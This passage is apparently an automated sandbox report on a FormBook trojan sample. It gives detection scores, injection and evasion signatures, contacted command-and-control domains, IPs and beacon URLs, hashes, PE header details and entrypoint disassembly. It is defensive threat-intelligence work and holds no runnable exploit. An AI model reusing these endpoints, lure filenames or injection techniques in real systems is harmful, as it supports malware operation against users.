        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        cmmon32.exe (16), started
            signatures: Performs DNS queries to domains with low reputation; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            cmd.exe (22), started
                conhost.exe (24), started
        explorer.exe (20), injected
            DNS/IP info: www.466se.com 198.74.106.237, 49755, 80, MULTA-ASN1US, United States; circusocks.com 163.123.204.26, 49754, 80, ILIGHT-NETUS, Reserved; 5 other IPs or domains
            signatures: System process connects to network (likely due to code injection or exploit)

Screenshots

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
mvui1vY6Mo.exe | 59% | Virustotal |
mvui1vY6Mo.exe | 61% | ReversingLabs | Win32.Trojan.FormBook
mvui1vY6Mo.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.mvui1vY6Mo.exe.2eb0000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.2.mvui1vY6Mo.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner | Label
ejsuniqueclasses.com | 2% | Virustotal |
www.466se.com | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://www.circusocks.com/ehp9/?zZbXur=fPkLdxO&0vrPA=oRr9ZXza/sqKFb1a4cLVquMpSAfNXH/ZGOEKtA079HuOHtafooLLPyAXrAQLja/+16Ky | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
www.ejsuniqueclasses.com/ehp9/ | 0% | Avira URL Cloud | safe
http://www.466se.com/ehp9/?0vrPA=UsPTfcJ0BZ5q3mR+pFMXthX3126RUWmODdEpc4rh++F4qt19VniXLc7dOQb8qNRTbKnv&zZbXur=fPkLdxO | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.856380062.xyz/ehp9/?zZbXur=fPkLdxO&0vrPA=sBJ6lOoTYYoNcaluCGHxKraeNDG0llcp1STurr5zu7Kck/pV | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.healthpragency.com/ehp9/?0vrPA=5Xsjz7+Z5WLh89j81EYl3Aroso+z/qN2CpRl0IKGrQQKTktOwLuaqldWAZoOLzUBzR5Q&zZbXur=fPkLdxO | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.ejsuniqueclasses.com/ehp9/?zZbXur=fPkLdxO&0vrPA=8c/5QoMWiMUW3SjDqDOgvqNfypt6IHckOwJjeT/c3u4BTCnBI4ecsnyb0a1UBRXLCY1T | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ejsuniqueclasses.com | 164.68.104.58 | true | true | | unknown
www.466se.com | 198.74.106.237 | true | true | | unknown
www.healthpragency.com | 52.58.78.16 | true | true | | unknown
www.856380062.xyz | 103.88.34.80 | true | true | | unknown
shops.myshopify.com | 23.227.38.74 | true | false | | unknown
circusocks.com | 163.123.204.26 | true | true | | unknown
www.comparaca.com | unknown | unknown | true | | unknown
www.circusocks.com | unknown | unknown | true | | unknown
www.ejsuniqueclasses.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.circusocks.com/ehp9/?zZbXur=fPkLdxO&0vrPA=oRr9ZXza/sqKFb1a4cLVquMpSAfNXH/ZGOEKtA079HuOHtafooLLPyAXrAQLja/+16Ky | true | Avira URL Cloud: safe | unknown
www.ejsuniqueclasses.com/ehp9/ | true | Avira URL Cloud: safe | low
http://www.466se.com/ehp9/?0vrPA=UsPTfcJ0BZ5q3mR+pFMXthX3126RUWmODdEpc4rh++F4qt19VniXLc7dOQb8qNRTbKnv&zZbXur=fPkLdxO | true | Avira URL Cloud: safe | unknown
http://www.healthpragency.com/ehp9/?0vrPA=5Xsjz7+Z5WLh89j81EYl3Aroso+z/qN2CpRl0IKGrQQKTktOwLuaqldWAZoOLzUBzR5Q&zZbXur=fPkLdxO | true | Avira URL Cloud: safe | unknown
http://www.ejsuniqueclasses.com/ehp9/?zZbXur=fPkLdxO&0vrPA=8c/5QoMWiMUW3SjDqDOgvqNfypt6IHckOwJjeT/c3u4BTCnBI4ecsnyb0a1UBRXLCY1T | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.856380062.xyz/ehp9/?zZbXur=fPkLdxO&0vrPA=sBJ6lOoTYYoNcaluCGHxKraeNDG0llcp1STurr5zu7Kck/pV | cmmon32.exe, 0000000B.00000002.915247011.0000000000C60000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | explorer.exe, 00000004.00000000.663579400.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.fonts.com | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.58.78.16 | www.healthpragency.com | United States | 16509 | AMAZON-02US | true
163.123.204.26 | circusocks.com | Reserved | 1767 | ILIGHT-NETUS | true
164.68.104.58 | ejsuniqueclasses.com | Germany | 51167 | CONTABODE | true
103.88.34.80 | www.856380062.xyz | China | 136188 | CHINATELECOM-ZHEJIANG-NINGBO-IDCNINGBOZHEJIANGProvince | true
198.74.106.237 | www.466se.com | United States | 35916 | MULTA-ASN1US | true

                                            General Information

                                            Joe Sandbox Version: 33.0.0 White Diamond
                                            Analysis ID: 458944
                                            Start date: 03.08.2021
                                            Start time: 22:17:20
                                            Joe Sandbox Product: CloudBasic
                                            Overall analysis duration: 0h 8m 40s
                                            Hypervisor based Inspection enabled: false
                                            Report type: full
                                            Sample file name: mvui1vY6Mo (renamed file extension from none to exe)
                                            Cookbook file name: default.jbs
                                            Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed: 21
                                            Number of new started drivers analysed: 0
                                            Number of existing processes analysed: 0
                                            Number of existing drivers analysed: 0
                                            Number of injected processes analysed: 0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode: default
                                            Analysis stop reason: Timeout
                                            Detection: MAL
                                            Classification: mal100.troj.evad.winEXE@8/0@7/5
                                            EGA Information: Failed
                                            HDC Information:
                                            • Successful, ratio: 35.2% (good quality ratio 32.2%)
                                            • Quality average: 75.4%
                                            • Quality standard deviation: 31.2%
                                            HCA Information:
                                            • Successful, ratio: 94%
                                            • Number of executed functions: 82
                                            • Number of non-executed functions: 93
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.211.5.146, 40.88.32.150, 168.61.161.212, 23.211.6.115, 20.82.209.183, 93.184.221.240, 20.82.210.154, 80.67.82.211, 80.67.82.235, 40.112.88.60
                                            • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, wu.azureedge.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net
                                            • Not all processes were analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            Match: 52.58.78.16
                                            Associated Sample Name / URL | Detection | Context
                                            Form_TT_EUR57,890.exe | malicious | www.mobiessence.com/6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8
                                            NEW ORDER.xlsx | malicious | www.legifo.com/n84e/?Mr08h0L=KHFThDJ3uNdvz4VUDR+6bS8SYcpLrpRC8lOMf3TlZ3PS/XcNx/3d4GJoUukLL5LRpfRfOA==&zVopsT=6lRxBfwpGVRluDfp
                                            Payment confirmation.exe | malicious | www.simplenorwegian.com/iq3g/?IrK=CZ/yXVcNRdC6FvxinIXGrVmHiuR1WjT6SNukwgkxBNtmMQmyCWCLRoMj7G3k0Wznru0p&U0GD=nTvlUPapR
                                            DHL Shipment Notification,PDF.exe | malicious | www.crosschainconsulting.com/d8ak/?l8zt=jDth58DB5imLqUkIs94ZrvJvWs5Ik/QXC2wgF4rLpwBCIv0jyvuCPBHay7TuoSVne/lyNJlz0g==&GT=8pBhLdXXedUx8
                                            RhalEFwYre.exe | malicious | www.mobiessence.com/6mam/?7nZp_P=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH6NTpTQPuYh&l48tB=-ZYD52r
                                            RYP-210712.xlsx | malicious | www.threatprotection.net/6mam/?O2M0W=yVJpjpi8601X&TP=5U63IG+7yBTG2LU/sbhPJsaYeNu0pzfei2tMILncnfG3lfTZPYhqam4eeguQu/uCp/fddQ==
                                            sMpEuBRc2t.exe | malicious | www.ecofingers.com/dy8g/?OR-TuR7X=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0knK24QskGlt&aPpl=k0DD1ZKh
                                            INV NO-1820000514 USD 270,294.pdf.exe | malicious | www.midgefly.com/vtg0/?8pcx=sCrA+W5O6oNqspHIzbx/VoZ2gHLngFo2bTHVR61MqOIzfC7Xnf47aZIrFlXsjUrU46mf&b8Zd=YdoHsDD
                                            6al00IjI6j.exe | malicious | www.walkonhome.com/p1nr/?EVL=7zqpjNgTocuQEZ/7cot9yzbg96wEePlUEUbJytYr6EKC6aCaKn2SKTFFolhpeAkAzVfO4NkQJQ==&YTOx3p=8pgHdZbp
                                            RYP-210629.xlsx | malicious | www.mobiessence.com/6mam/?8pWX_=KE8gpfUButRuMRaKHV5goIwNmc44LE6Oi+XDAS05rkp2RTHle1NPjCzZMh2LYYHbaIsWTA==&YH=c8zlrpFp7PZpmtep
                                            Invoice Amount 14980.exe | malicious | www.bvlesty.com/p4se/?7npd928=bQMAraj1xKdOkCzLuHERhNooHK+QGPNFLNpMJV9bH8WlaoVv6+ueUmNZD2UWSIOcTisLluXEOQ==&U2M=m0GHc
                                            moni 33.exe | malicious | www.kathyharvey.com/weni/?eB2=SZj8b&9rjDM4rH=7yHtpb+g0rUXbgxV21t9L0ENNL4bw8lTqOTLyZUlhT1yXa0UMrAsRH4DxLIXKzBvV8Hk
                                            ORDER -ASLF1SR00116-PDF.doc | malicious | www.alorve.com/b8eu/?ezr8A=fO29zInUMKyU3b+KsEdF7DM9YDGDqhkmHUf250wyCdvZQv4CxZtnkbBczt1PyCe3FLSzQg==&9rXX=a0DtZFt
                                            PO#2005042020.exe | malicious | www.ameri.loans/dt9v/?gHX8R=3f94lB&1b=43H5ZqapR2U2c+53UedyyCnf/tAQMSihskCSywJ+5iH1soBQckHw2KLaysybCXDa0Ipi
                                            Tvpsqjokvrkkjtpqmbrrbdjuamqgumvxld.exe | malicious | www.midtransport.com/bsk9/?i2MTzj=e6Ad4DCXPNMpz&R6ALR=nGfZtT9z8NqeTucFxi+gOh3uBJjOp6VLDHhxDth/dQigt4sUKXTHk5a7oDAXiSxv27Tv
                                            shipping documents pdf.exe | malicious | www.unitedold.com/h388/?tXPL5r6=HeOxd3fTK3emeSZhIcEHyZUbH5pi5uzRBKaOyXjbbuHI/gxjF5X3QotEpSoKmdp15nJu&3fVtLD=R62l7bm8DvSh1
                                            6WCqIIE3Lr.exe | malicious | www.walkonhome.com/p1nr/?dF=7zqpjNgTocuQEZ/7cot9yzbg96wEePlUEUbJytYr6EKC6aCaKn2SKTFFomNTdBI7wi+f&3fd=t0DXgf78DRWhP
                                            Order600567.exe | malicious | www.nyprfirm.com/dt9v/?9r=KpNyOXsodBFrYFoEJWESYJ8j+xdDddhLA6DxFp7h+PiJibU+kgoAhy+eZziY74LDARZk&yt=WN9pTDLhcH
                                            PYY74882220#.exe | malicious | www.jayhoudontcy.com/uts2/?DJBpbT=eq1DVE9pIkM/j+XzQEEtVvuS45EQn6ChhwPxb1E+vp9zidYYg0/iq0gGrr3/IXwpgX+z&bPw0=RjQtV0Ip1lbh
                                            v8kZUFgdD4.exe | malicious | www.ecofingers.com/dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx

                                            Match: 164.68.104.58
                                            Associated Sample Name / URL | Detection | Context
                                            wMqdemYyHm.exe | malicious | www.ejsuniqueclasses.com/f0sg/?7n0lqHm=RD2tywN0qen0MznjTH5w58f8vni0uSDATZhtlh9xAz/QS3pDgsNhlBhKQDKwaal1DgGG&CP=chrxU

                                            Domains

                                            Match: shops.myshopify.com
                                            Associated Sample Name / URL | Detection | Context
                                            Nouveau bon de commande. 3007021_pdf.exe | malicious | 23.227.38.74
                                            Purchase Requirements.exe | malicious | 23.227.38.74
                                            Form_TT_EUR57,890.exe | malicious | 23.227.38.74
                                            INV NO-1820000514 USD 270,294.pdf.exe | malicious | 23.227.38.74
                                            payment copy.exe | malicious | 23.227.38.74
                                            PO_0008.exe | malicious | 23.227.38.74
                                            i9Na8iof4G.exe | malicious | 23.227.38.74
                                            bin.exe | malicious | 23.227.38.74
                                            Payment For Invoice 321-1005703.exe | malicious | 23.227.38.74
                                            RYP-210712.xlsx | malicious | 23.227.38.74
                                            INV NO-1820000514 USD 270,294.pdf.exe | malicious | 23.227.38.74
                                            auhToVTQTs.exe | malicious | 23.227.38.74
                                            kKTeUAtiIP.exe | malicious | 23.227.38.74
                                            Invoice Amount 14980.exe | malicious | 23.227.38.74
                                            W7f.PDF.exe | malicious | 23.227.38.74
                                            Order Signed PEARLTECH contract and PO.exe | malicious | 23.227.38.74
                                            MR# RFx 21-2034021.exe | malicious | 23.227.38.74
                                            AWB & Shipping Tracking Details.exe | malicious | 23.227.38.74
                                            ORDER -RFQ#-TEOS1909061 40HC 21T05 DALIAN.doc | malicious | 23.227.38.74
                                            Nsda7LTM1x.exe | malicious | 23.227.38.74

                                            ASN

                                            Match: ILIGHT-NETUS
                                            Associated Sample Name / URL | Detection | Context
                                            SARS_DOCUMENT - Copy.html | malicious | 152.228.223.13
                                            w4DEaimFEt | malicious | 199.13.204.199
                                            w4MaMzd0i1 | malicious | 199.14.229.225
                                            Loader.exe | malicious | 152.228.150.198
                                            EM7kj9300x | malicious | 152.228.110.191
                                            MMrfxxpTLP | malicious | 137.114.114.119
                                            6HAisf3waN | malicious | 157.91.133.210
                                            c51w5YSYdO | malicious | 159.218.155.213
                                            u47x3rc20t | malicious | 159.218.253.86
                                            zhPAQB7FPV | malicious | 161.33.66.54
                                            BWG6npgduP | malicious | 199.13.163.48
                                            jEbpttXKCa | malicious | 159.218.253.96
                                            0aC0TBcdxb | malicious | 152.228.110.163
                                            🔊js_msg_ 3pm.html | malicious | 152.228.223.13
                                            🔊Msg_ 3pm.html | malicious | 152.228.223.13
                                            INV_RECON_72919_81821.html | malicious | 152.228.223.13
                                            __-joerg.mathieu.htm | malicious | 152.228.223.13
                                            KHv0I3XdY6.exe | malicious | 152.228.150.198
                                            sample_payment.html | malicious | 152.228.223.13
                                            Injector.exe | malicious | 152.228.150.205

                                            Match: AMAZON-02US
                                            Associated Sample Name / URL | Detection | Context
                                            ctapp_230720_b1nt12.zip | malicious | 54.70.175.13
                                            Dosusign_Na_Sign.htm | malicious | 54.200.233.179
                                            document.xlsm | malicious | 65.9.71.95
                                            document.xlsm | malicious | 65.9.71.119
                                            InNXA1LFMy | malicious | 52.24.2.19
                                            Z06maMhQlw.exe | malicious | 104.192.141.1
                                            OJYNvmFRjr | malicious | 54.117.189.7
                                            AEOjFHGJAr | malicious | 44.246.15.55
                                            oustanding 03082921.xlsx | malicious | 13.229.216.142
                                            1ashnfHZve.exe | malicious | 54.94.248.37
                                            U2AHuu893x.exe | malicious | 54.94.248.37
                                            w7DRtI5vjJ | malicious | 34.221.177.96
                                            xl2TVqLo6S | malicious | 13.50.207.75
                                            Form_TT_EUR57,890.exe | malicious | 52.58.78.16
                                            Amaury.vanvinckenroye-AudioMessage_520498.htm | malicious | 13.224.96.22
                                            INV NO-1820000514 USD 270,294.pdf.exe | malicious | 13.233.152.221
                                            CyLELjM5zk.exe | malicious | 52.219.8.114
                                            gunzipped.exe | malicious | 3.142.167.4
                                            NEW ORDER.xlsx | malicious | 52.58.78.16
                                            Click_me_to_install_SnapTube_tube_apkpure_dl.apk | malicious | 52.222.158.105

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            No created / dropped files found

                                            Static File Info

                                            General

                                            File type: PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit): 7.1527685601415545
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name: mvui1vY6Mo.exe
                                            File size: 367359
                                            MD5: 059b1244ac9fda54de086692db4b5a08
                                            SHA1: 6e5f6326bd9da7e5d9c70b3e4491d308eb7f842b
                                            SHA256: abb29be2c1eccd851bdb99b126e822a8cf0f57be95e9b71a921aa703b2c285be
                                            SHA512: 513dabdcc13cd81b8be8cf9076862c5f0418d267ed7f6d9e1b7f008aa2f5cb7928ad8fc8a41b69a872d516f771098bd1d83eca86b9dd61b49332527d43e8427f
                                            SSDEEP: 6144:GCeJWu3gGB7g1TaqXp/bTLwlLGX7lQtbzRuYqCRxPi4f+99:uWcgGCTaqXhKLGEvRrnm99
                                            File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T7`=.V.n.V.n.V.n...n.V.n...njV.n...n.V.n+..o.V.n+..o.V.n+..o.V.n...n.V.n.V.nmV.n...o.V.n...n.V.n.V.n.V.n...o.V.nRich.V.n.......

                                            File Icon

                                            Icon Hash: 16232b2b33313300

                                            Static PE Info

                                            General

                                            Entrypoint: 0x401226
                                            Entrypoint Section: .text
                                            Digitally signed: false
                                            Imagebase: 0x400000
                                            Subsystem: windows gui
                                            Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp: 0x610728B8 [Sun Aug 1 23:05:28 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major: 6
                                            OS Version Minor: 0
                                            File Version Major: 6
                                            File Version Minor: 0
                                            Subsystem Version Major: 6
                                            Subsystem Version Minor: 0
                                            Import Hash: 589aee860f84814af33b4e1068b97d01

                                            Entrypoint Preview

                                            Instruction
                                            call 00007F8888C3355Fh
                                            jmp 00007F8888C33163h
                                            push ebp
                                            mov ebp, esp
                                            mov eax, dword ptr [00414018h]
                                            and eax, 1Fh
                                            push 00000020h
                                            pop ecx
                                            sub ecx, eax
                                            mov eax, dword ptr [ebp+08h]
                                            ror eax, cl
                                            xor eax, dword ptr [00414018h]
                                            pop ebp
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            mov eax, dword ptr [ebp+08h]
                                            push esi
                                            mov ecx, dword ptr [eax+3Ch]
                                            add ecx, eax
                                            movzx eax, word ptr [ecx+14h]
                                            lea edx, dword ptr [ecx+18h]
                                            add edx, eax
                                            movzx eax, word ptr [ecx+06h]
                                            imul esi, eax, 28h
                                            add esi, edx
                                            cmp edx, esi
                                            je 00007F8888C332EBh
                                            mov ecx, dword ptr [ebp+0Ch]
                                            cmp ecx, dword ptr [edx+0Ch]
                                            jc 00007F8888C332DCh
                                            mov eax, dword ptr [edx+08h]
                                            add eax, dword ptr [edx+0Ch]
                                            cmp ecx, eax
                                            jc 00007F8888C332DEh
                                            add edx, 28h
                                            cmp edx, esi
                                            jne 00007F8888C332BCh
                                            xor eax, eax
                                            pop esi
                                            pop ebp
                                            ret
                                            mov eax, edx
                                            jmp 00007F8888C332CBh
                                            call 00007F8888C33A04h
                                            test eax, eax
                                            jne 00007F8888C332D5h
                                            xor al, al
                                            ret
                                            mov eax, dword ptr fs:[00000018h]
                                            push esi
                                            mov esi, 00414E24h
                                            mov edx, dword ptr [eax+04h]
                                            jmp 00007F8888C332D6h
                                            cmp edx, eax
                                            je 00007F8888C332E2h
                                            xor eax, eax
                                            mov ecx, edx
                                            lock cmpxchg dword ptr [esi], ecx
                                            test eax, eax
                                            jne 00007F8888C332C2h
                                            xor al, al
                                            pop esi
                                            ret
                                            mov al, 01h
                                            pop esi
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            cmp dword ptr [ebp+08h], 00000000h
                                            jne 00007F8888C332D9h
                                            mov byte ptr [00414E40h], 00000001h
                                            call 00007F8888C33825h
                                            call 00007F8888C33CABh
                                            test al, al
                                            jne 00007F8888C332D6h
                                            xor al, al
                                            pop ebp
                                            ret
                                            call 00007F8888C35585h

                                            Rich Headers

                                            Programming Language:
                                            • [LNK] VS2015 UPD3.1 build 24215
                                            • [RES] VS2015 UPD3 build 24213

                                            Data Directories

                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1318c | 0x64 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17000 | 0xeb38 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x26000 | 0x107c | .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x12a30 | 0x54 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x12a88 | 0x40 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0xe000 | 0x1a8 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                            Sections

                                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x1000 | 0xc727 | 0xc800 | False | 0.55521484375 | data | 6.58406005162 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rdata | 0xe000 | 0x5ac6 | 0x5c00 | False | 0.422299592391 | data | 4.93015425606 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data | 0x14000 | 0x19c8 | 0x1000 | False | 0.313232421875 | DOS executable (block device driver \277DN) | 3.41532208548 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .gfids | 0x16000 | 0xac | 0x200 | False | 0.28125 | data | 1.44064934011 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .rsrc | 0x17000 | 0xeb38 | 0xec00 | False | 0.0876423463983 | data | 1.8711448419 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc | 0x26000 | 0x107c | 0x1200 | False | 0.769097222222 | data | 6.36802237044 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            Name | RVA | Size | Type | Language | Country
                                            RT_ICON | 0x170f0 | 0xe8ac | data | English | United States
